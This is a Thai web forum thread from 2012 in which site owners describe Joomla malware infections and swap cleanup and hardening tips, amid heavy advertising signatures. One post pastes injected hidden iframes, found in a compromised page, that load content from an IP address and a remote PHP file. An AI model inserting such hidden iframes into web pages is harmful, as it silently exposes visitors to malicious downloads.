ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย

เริ่มโดย illusionto, 07 กรกฎาคม 2012, 02:40:33

หัวข้อก่อนหน้า - หัวข้อถัดไป

0 สมาชิก และ 1 ผู้มาเยือน กำลังดูหัวข้อนี้

illusionto

 :wanwan044: กำลังนั่งเซ็งอยู่เลยครับไม่คิดว่าจะโดนเองหลังจากที่เคยเห็นแต่เว็บคนอื่นเขาโดนกัน ส่วนใหญ่ ผมใช้ joomla เป็นหลัก มาวันนี้ joomla ป่วยติดไวรัส มัลแวร์เลย จากการประกาศเตือน ของอากู๋ก่อนหน้านี้ จากการแนะนำสำหรับเว็บที่ติดมัลแวร์ http://www.stopbadware.org/home/security เปิดเว็บตัวเองวันนี้โดนเลย ใครพอมีแนวทางการกำจัดไวรัส ทั้งในโฮส และเครื่องคอมพิวเตอร์ของเรา  :wanwan017: ช่วยผมทีนะคร้าบ เผื่อใครที่โดนแบบผมจะได้แก้ไขได้ทัน  :'( ครั้งแรกของการทำเว็บ  ขอบคุณคร้าบ
[direct=http://www.midoriairfresh.com]แผ่นน้ำหอม[/direct]
[direct=http://www.tososay.com]รวมแหล่งไอที[/direct]

ShizzK

ของผมนะครับ โหลดไฟล์มาที่เครื่อง แล้วสแกนไวรัสดู ถ้าไม่มี

ให้เราสแกนเครื่องของเรา เปลี่ยนพาส ftp ไปหาไฟล์ที่ติดมัลแวร์ ส่วนใหญ่เวลาเข้าไปในไฟล์นั้นมันจะขึ้นว่าติดมัลแวร์

แสดงว่าไฟล์นั้นแหละตัวนำไวรัส ถ้าำไม่เจอไฟล์ไหนเลย

ก็ให้เราไปดูที่ htaccess ดูว่ามีการ refer หรือโยกย้ายหน้าโดเมนไปที่อื่นรึเปล่า หรือไปดูที่ google webmaster tools นะครับ

เขาจะบอกไ้ว้หมด

illusionto

อ้างถึงจาก: ShizzK ใน 07 กรกฎาคม 2012, 07:48:50
ของผมนะครับ โหลดไฟล์มาที่เครื่อง แล้วสแกนไวรัสดู ถ้าไม่มี

ให้เราสแกนเครื่องของเรา เปลี่ยนพาส ftp ไปหาไฟล์ที่ติดมัลแวร์ ส่วนใหญ่เวลาเข้าไปในไฟล์นั้นมันจะขึ้นว่าติดมัลแวร์

แสดงว่าไฟล์นั้นแหละตัวนำไวรัส ถ้าำไม่เจอไฟล์ไหนเลย

ก็ให้เราไปดูที่ htaccess ดูว่ามีการ refer หรือโยกย้ายหน้าโดเมนไปที่อื่นรึเปล่า หรือไปดูที่ google webmaster tools นะครับ

เขาจะบอกไ้ว้หมด

ขอบคุณมากเลยครับ ครั้งแรกเลยที่โดน เวลาเข้าระบบ admin หรือ host ทีก็กลัวๆอยู่ว่าถ้าเข้าไปดำเนินการต่อ จะติดไวรัสมัลแวร์เพิ่มอีกไหม ทำให้ล่าช้าในการแก้ไวรัสครับ
[direct=http://www.midoriairfresh.com]แผ่นน้ำหอม[/direct]
[direct=http://www.tososay.com]รวมแหล่งไอที[/direct]

Bes

ระวังเรื่องการ Chmod 777 ให้เฉพาะที่ Joomla ต้องการก็พอ มากกว่านั้นจะมีปัญหาได้

[direct=https://client.hostsevenplus.com/aff.php?aff=396]✔ แนะนำ Hosting และ VPS ราคาเริ่มต้น 277 บาทฟรี! SSL ซัพพอทคุยง่าย[/direct]

[direct=https://www.bitkub.com/signup?ref=512782]✔ ซื้อบิทคอยที่ Bitkub (ได้รับการรับรองจาก กลต.)[/direct]

smapan

เบื้องต้นสุดๆของการรักษาความปลอดภัย คืออัพเดต version ให้ล่าสุดเสมอ ครับ
[direct=http://cp.siamhostweb.com/cart.php?gid=1]จูมล่าโฮส สยามโฮสเว็บ[/direct] [direct=http://www.modty.com]modty.com[/direct]
[direct=http://www.apartment.in.th]รวมที่พัก เช่ารายวัน ที่พักเช่ารายเดือนมากที่สุดแจ่มจริง[/direct]
***Tel 083-757-1515 ติดปัญหา Joomla ตรงไหนรับปรึกษาฟรี โทรมาเถอะครับ ถ้าตอบได้ช่วยแน่นอน ไม่มีกั้ก. ***

Freedomlover

อ้างถึงจาก: smapan ใน 13 กรกฎาคม 2012, 10:49:09
เบื้องต้นสุดๆของการรักษาความปลอดภัย คืออัพเดต version ให้ล่าสุดเสมอ ครับ

แนะนำตามนี้ครับ
[direct=https://www.jaideawhosting.com/web-hosting/]โฮสติ้ง[/direct] คุณภาพสูง ราคาเริ่มต้น 50 บาท/เดือน ทดลองใช้ฟรี 30 วัน
[direct=https://www.jaideawhosting.com/vps-hosting/]SSD VPS[/direct] แรงๆ
จดโดเมนเพียง 400 บาท/ปี
ด้วยประสบการณ์กว่า 12 ปี  Tel 0840640213


binknon7


iamscreener

อ้างถึงจาก: illusionto ใน 07 กรกฎาคม 2012, 02:40:33
:wanwan044: กำลังนั่งเซ็งอยู่เลยครับไม่คิดว่าจะโดนเองหลังจากที่เคยเห็นแต่เว็บคนอื่นเขาโดนกัน ส่วนใหญ่ ผมใช้ joomla เป็นหลัก มาวันนี้ joomla ป่วยติดไวรัส มัลแวร์เลย จากการประกาศเตือน ของอากู๋ก่อนหน้านี้ จากการแนะนำสำหรับเว็บที่ติดมัลแวร์ http://www.stopbadware.org/home/security เปิดเว็บตัวเองวันนี้โดนเลย ใครพอมีแนวทางการกำจัดไวรัส ทั้งในโฮส และเครื่องคอมพิวเตอร์ของเรา  :wanwan017: ช่วยผมทีนะคร้าบ เผื่อใครที่โดนแบบผมจะได้แก้ไขได้ทัน  :'( ครั้งแรกของการทำเว็บ  ขอบคุณคร้าบ
ผมก็เพิ่งโดนไปครับ เป็นกำลังใจให้ครับ

denzicrew

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

smapan

อ้างถึงจาก: denzicrew ใน 17 กรกฎาคม 2012, 10:31:04
หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

อัพเดต ตรงไหนครับที่พัง และ พังยังไงครับ
[direct=http://cp.siamhostweb.com/cart.php?gid=1]จูมล่าโฮส สยามโฮสเว็บ[/direct] [direct=http://www.modty.com]modty.com[/direct]
[direct=http://www.apartment.in.th]รวมที่พัก เช่ารายวัน ที่พักเช่ารายเดือนมากที่สุดแจ่มจริง[/direct]
***Tel 083-757-1515 ติดปัญหา Joomla ตรงไหนรับปรึกษาฟรี โทรมาเถอะครับ ถ้าตอบได้ช่วยแน่นอน ไม่มีกั้ก. ***

dramaseo

อ้างถึงจาก: denzicrew ใน 17 กรกฎาคม 2012, 10:31:04
หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

ก่อนอัพเดทผมจะแบคอัพไว้ก่อนเสมอ แล้วอัพเดทแบบเมนวลคือโยนไฟล์อัพเดทเข้าไปแทนทีเดิมใน FTP ซึ่งจริงๆหลังเว็บมีให้อัพเดทแบบออโต้นะ แต่ช้าๆอึดอัพเลยใช้แบบเมนวลแทน และไม่เคยพบว่าเว็บพังเลยนะ ต้องดูเวอร์ชั่นอัพเดทให้ตรงด้วย เช่นอัพจาก 2.5.4 ไป 2.5.6 ก็ต้องหาไฟล์เฉพาะของมัน

jupiterjan

บริการ Text link web Pr5 (DA=47 PA=55 mR=5.13) ติด dmoz อายุ 20ปี(1996-2016) แถม Pr4 1เว็บ pr2 2เว็บ  pr1 1เว็บ ราคา 700 ต่อ เดือน สนใจPM ครับ  แสดงผล ทุกหน้า
- ไม่รับเว็บที่ผิดกฎหมาย , 18+ , การพนัน , เว็บหมิ่นสถาบัน
[direct=http://www.thaipropertytoday.com/]ข่าวอสังหา ล่าสุด[/direct]     ่ว่าง 3ที่
ขายโดเมน koratnow.com  2000 บาท godaddy
user thaiseomarket :: infinitewire

dramaseo

อีกอย่างพวกเทมเพลตมาตรฐานที่แถมมาให้ ถ้าเราโมด้วยเทมเพลตเหล่านี้มันจะอัพเดทด้วย ต้องแบคอัพไฟล์เทมเพลตไว้ก่อน แล้วค่อยเอาไปทับหลังอัพเดท

denzicrew

อ้างถึงจาก: dramaseo ใน 17 กรกฎาคม 2012, 10:40:17
อ้างถึงจาก: denzicrew ใน 17 กรกฎาคม 2012, 10:31:04
หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

ก่อนอัพเดทผมจะแบคอัพไว้ก่อนเสมอ แล้วอัพเดทแบบเมนวลคือโยนไฟล์อัพเดทเข้าไปแทนทีเดิมใน FTP ซึ่งจริงๆหลังเว็บมีให้อัพเดทแบบออโต้นะ แต่ช้าๆอึดอัพเลยใช้แบบเมนวลแทน และไม่เคยพบว่าเว็บพังเลยนะ ต้องดูเวอร์ชั่นอัพเดทให้ตรงด้วย เช่นอัพจาก 2.5.4 ไป 2.5.6 ก็ต้องหาไฟล์เฉพาะของมัน

อัพจาก 1.5 ไป 2.5 ค่ะ เลยพัง (จริงๆมันก็สมควรใช่มั้ยล่ะ )

siamlivehost

ของลูกค้าผม ส่วนมากจะพรุนจาก template เถื่อนที่โหลดมาใช้กัน

เร็ว แรง บริการดี เหตุผลที่ใคร ๆ ก็เลือกใช้ ZimpleCloud
[direct=https://zimple.cloud/cloud-ssd-web-hosting]Cloud SSD Web Hosting[/direct] [direct=https://zimple.cloud/cloud-ssd-web-hosting]โฮสติ้ง Cloud SSD ไม่จำกัด Domain[/direct] [direct=https://siamlivehost.com/vps/]Linux VPS เร็ว แรง Free DirectAdmin[/direct] [direct=https://www.baansiriporn.com]รีสอร์ทอัมพวา[/direct]

eyourhand

เว็บผมก็โดนครับ เป็น WP

เบื้องต้นให้รีบทันทีคือ
- เปลี่ยน Pwd: FTP , Backend ต่างๆ ก่อน
- ปรับ CMOD : เป็นระดับ 644 , 444 (index.php)
- สแกนไวรัส ที่เครื่องตัวเองครับ
- ใช้ FileZilla ในการอัฟโหลด และล้าง pwd การ login เข้า ทุกครั้ง

ส่วนต่อมา
- Google webmaster tool ก็สมัครเพื่อให้เห็นปัญหาครับ
ยังไงปรึกษา ทาง PM ได้ครับ  :wanwan017:
[direct= https://www.facebook.com/share/1CS2KVrYoTgRKAKA/?mibextid=LQQJ4d]บริการรันบอทรายเดือนเพียง 1,000 บาท ด้วย 7days Crypto Spot Grid & Sell MT5 BOT เพื่อไม่พลาดทำกำไรสภาวะตลาดขาลง หรือ sideway down ขณะที่ตลาดขาขึ้น ก็ทำกำไรได้เช่นกัน ติดต่อหรือติดตามเพจ คลิ๊กลิ้งค์นี้ได้เลยครับ[/direct]

[direct=https://docs.google.com/document/d/1--EVqdmIBAU5EruKW7c1DWjS8xNdt1c4eYhocDR-L9w/edit]คู่มือ เงื่อนไขการเทรดของบอทครับ คลิ๊กที่นี่อ่านได้เลย[/direct]

fungi456

4 เว็บ โดนทั้ง Joomla และ SMF ตอนนี้แก้ไขเรียบร้อยหมดแล้ว แต่ก็ยังแอบหวั่นใจอยู่ ช่วงนี้ต้องระวังมากๆ ชุมกว่าหวัดนกอีก
จำหน่ายเครื่องซัก อบ รีด อุตสาหกรรม http://www.xn--12cahmu5d5b2blga5fnve5dtd8f2a0n9g3a.com
จะขายอะไรดี.com  http://xn--22cl1b3cf3dsdp9a4m.com/
http://chevysonic-club.com
http://www.tripandhotel.com

greennud

รบกวนสอบถามครับ ว่า

เมื่อเราเข้าไปที่หน้า url http://www.abc.com/index.php/visa

เมื่อเราดูจาก code จาก page source แล้วพบว่าพบ code ที่โดนแทรก code อย่างนี้

=====================================

<iframe onload="iFrameHeight()"   id="blockrandom"
   name=""
   src="http://88.198.219.85"
   width="1"
   height="1"
   scrolling="auto"
   align="top"
   frameborder="0"
   class="wrapper">
   No Iframes</iframe>
?>
</body><iframe src="http://www.emkbiyomedikal.com.tr/tmp/ini.php"  width="0" height="0" frameborder="0"></iframe>

=====================================

หากผมต้องการเข้าไปลบออก ต้องไปลบที่ไฟล์ไหนครับ
ขอบคุณมากครับ


phpwin

อ้างถึงจาก: Bes ใน 07 กรกฎาคม 2012, 23:30:32
ระวังเรื่องการ Chmod 777 ให้เฉพาะที่ Joomla ต้องการก็พอ มากกว่านั้นจะมีปัญหาได้
ตามความคิดเห็นนี้ครับ 777 เฉพาะการอัพโหลดรูปหรือไฟล์ก็พอครับ แล้วเขียน .htaccess ดักในโฟลเดอร์นั้นอีกทีว่า ให้อัพโหลดไฟล์นามสกุลอะไรได้บ้าง
แนะนำให้อัพเกรดเป็นเวอร์ชั่นล่าสุดครับ ตอนนี้ผมใช้ Joomla 2.5.14 อยู่ครับ
http://www.joomlacorner.com/joomla-news/829-joomla-2-5-14-released.html
[direct=http://php-for-ecommerce.blogspot.com]สอน PHP ร้านค้าออนไลน์[/direct]  [direct=http://php-for-ecommerce.blogspot.com/p/blog-page.html]รับทำเว็บไซต์ ร้านค้าออนไลน์ ราคาถูก[/direct] #รับแก้ไขเว็บไซต์ #รับปรับแต่ง Open Cart #รับปรับแต่งเว็บไซต์ให้ไวติดจรวด #ขายเว็บไซต์เช็คราคาสินค้าแบบเทพๆ lnwprice.com